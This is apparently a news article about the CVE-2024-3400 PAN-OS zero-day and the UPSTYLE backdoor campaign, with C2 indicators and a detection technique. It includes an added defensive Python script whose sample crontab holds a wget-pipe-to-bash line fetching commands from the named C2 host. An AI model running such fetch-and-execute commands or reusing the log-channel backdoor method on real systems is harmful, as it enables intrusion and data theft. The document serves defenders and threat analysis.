Threat actors have been exploiting a newly disclosed zero-day vulnerability in Palo Alto Networks PAN-OS software since March 26, 2024, nearly three weeks before it came to light yesterday.
The cybersecurity company’s Unit 42 division is tracking the activity under the name Operation MidnightEclipse, attributing it to a single threat actor of unknown origin.
This security vulnerability, tracked as CVE-2024-3400 (CVSS score: 10.0), is a command injection flaw that allows an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.
It is worth noting that the issue only applies to PAN-OS 10.2, PAN-OS 11.0 and PAN-OS 11.1 firewall configurations with both the GlobalProtect gateway and device telemetry enabled.
Operation MidnightEclipse exploits the flaw to create a cron job that runs every minute to fetch commands hosted on an external server (“172.233.228[.]93/policy” or “172.233.228[.]93/patch”) and then execute them using the bash shell.
The attackers are said to have manually managed the access control list (ACL) of the command-and-control (C2) server to ensure that it could only be accessed from the devices communicating with it.
While the exact nature of the commands is unclear, the URL is suspected to be the delivery vehicle for a Python-based backdoor on the firewall, tracked as UPSTYLE, which Volexity discovered in the wild exploiting CVE-2024-3400 on April 10, 2024, and which is hosted on a different server (“144.172.79[.]92” and “nhdata.s3-us-west-2.amazonaws[.]com”).
The Python file is designed to write and launch another Python script (“system.pth”), which in turn decodes and runs an embedded backdoor component responsible for executing the threat actor’s commands, which are read from a file named “sslvpn_ngx_error.log”. The results of those operations are written to a separate file named “bootstrap.min.css”.
The most interesting aspect of the attack chain is that the files used to read the commands and write the results are legitimate files associated with the firewall:
- /var/log/pan/sslvpn_ngx_error.log
- /var/appweb/sslvpndocs/global-protect/portal/css/bootstrap.min.css
To get commands into the web server’s error log, the threat actors send specially crafted requests for non-existent web pages whose paths contain a specific pattern. The backdoor then parses the log file, searches for lines matching the regular expression (“img\[([a-zA-Z0-9+/=]+)\]”), and decodes and executes the commands embedded in them.
“The script will then create another thread and run a function called ‘restore,’” Unit 42 said. “The restore function obtains the original content and original access and modification times of the bootstrap.min.css file, sleeps for 15 seconds and writes the original content back to the file, and sets the access and modification times to their original values.”
The main goal appears to be to avoid leaving a trace of the command output, so the results have to be exfiltrated within 15 seconds, before the file is overwritten.
In its own analysis, Volexity said it observed the threat actor remotely exploiting the firewalls to create reverse shells, download additional tools, pivot into internal networks and ultimately exfiltrate data. The exact scale of the campaign is unclear. The company has assigned the adversary the moniker UTA0218.
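The every-minute cron fetch and the log-file command channel described above give defenders two concrete things to check on a suspect appliance. The following Python script is an added example written for this page; it is not code from Unit 42, Volexity, or the backdoor itself. It scans constructed sample error-log lines for the `img[...]` pattern reported above, base64-decodes each token so an analyst can see what would have been executed (nothing is run), and flags crontab entries that run every minute and reference the C2 address the article names. The sample log lines, the crontab text and the function names are assumptions made up for the demonstration.

```python
import base64
import re
from typing import Dict, List, Sequence

# Regular expression the article reports the UPSTYLE backdoor uses to pull
# commands out of /var/log/pan/sslvpn_ngx_error.log.
CMD_PATTERN = re.compile(r"img\[([a-zA-Z0-9+/=]+)\]")

# C2 address named in the article (printed defanged there as 172.233.228[.]93).
C2_INDICATORS = ("172.233.228.93",)

# Constructed sample log lines in an nginx-style error-log layout: an ordinary
# 404, a request carrying a base64 token of "echo hello", and a request whose
# token is not valid base64 (the pattern alone is still an indicator).
SAMPLE_LOG = [
    '2024/04/10 09:14:02 [error] 2231#0: *7 "/global-protect/portal/css/missing.css" is not found, client: 198.51.100.7',
    '2024/04/10 09:14:05 [error] 2231#0: *8 "/global-protect/portal/css/img[ZWNobyBoZWxsbw==].css" is not found, client: 198.51.100.7',
    '2024/04/10 09:14:09 [error] 2231#0: *9 "/global-protect/portal/css/img[abc].css" is not found, client: 198.51.100.7',
]

# Constructed crontab text: one legitimate entry and one every-minute fetch
# from the C2 host, shaped like the behaviour the article describes.
SAMPLE_CRONTAB = """\
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
* * * * * /usr/bin/wget -qO- http://172.233.228.93/policy | /bin/bash
"""


def find_injected_commands(log_lines: List[str]) -> List[Dict[str, object]]:
    """Return every img[...] token found in the log, with its base64 decoding.

    Decoding is for analyst review only; nothing is executed. Tokens that are
    not valid base64 are still reported, with decoded=None.
    """
    findings = []
    for lineno, line in enumerate(log_lines, start=1):
        for match in CMD_PATTERN.finditer(line):
            token = match.group(1)
            try:
                decoded = base64.b64decode(token, validate=True).decode("utf-8", errors="replace")
            except ValueError:  # binascii.Error is a ValueError subclass
                decoded = None
            findings.append({"line": lineno, "token": token, "decoded": decoded})
    return findings


def suspicious_cron_entries(crontab_text: str, indicators: Sequence[str] = C2_INDICATORS) -> List[str]:
    """Flag crontab lines that run every minute and reference a known C2 host."""
    flagged = []
    for line in crontab_text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        fields = stripped.split(None, 5)  # five schedule fields + the command
        if len(fields) < 6:
            continue
        every_minute = fields[:5] == ["*"] * 5
        references_c2 = any(ioc in fields[5] for ioc in indicators)
        if every_minute and references_c2:
            flagged.append(stripped)
    return flagged


if __name__ == "__main__":
    for hit in find_injected_commands(SAMPLE_LOG):
        print(f"log line {hit['line']}: token={hit['token']!r} decoded={hit['decoded']!r}")
    for entry in suspicious_cron_entries(SAMPLE_CRONTAB):
        print(f"suspicious cron entry: {entry}")
```

On a real appliance the same functions would be fed the contents of `/var/log/pan/sslvpn_ngx_error.log` and the system crontabs; because the backdoor restores `bootstrap.min.css` after 15 seconds, the log file and cron entries are the durable artefacts worth checking, not the CSS file.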
“The intelligence techniques and speed employed by the attackers demonstrate that the threat actors are highly capable and have a clear playbook on how to gain access to further their goals,” the US cybersecurity firm said.
“UTA0218’s initial goal was to obtain domain backup DPAPI keys and locate Active Directory credentials by obtaining the NTDS.DIT file. They further targeted user workstations to steal stored cookies and login data as well as user DPAPI key.”
Organizations are advised to look for signs of internal lateral movement originating from their Palo Alto Networks GlobalProtect firewall appliances.
The development also prompted the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to add the flaw to its Known Exploited Vulnerabilities (KEV) catalog, requiring federal agencies to apply patches by April 19 to mitigate potential threats. Palo Alto Networks expects to release a fix for the flaw by April 14.
“Targeting edge devices remains a popular attack vector for capable threat actors who have the time and resources to invest in researching new vulnerabilities,” Volexity said.
“Based on the resources required to develop and exploit a vulnerability of this nature, the types of victims this actor targeted, and the demonstrated functionality to install a Python backdoor and gain further access to victims, UTA0218 is likely to be a state-sponsored network of threat actors.”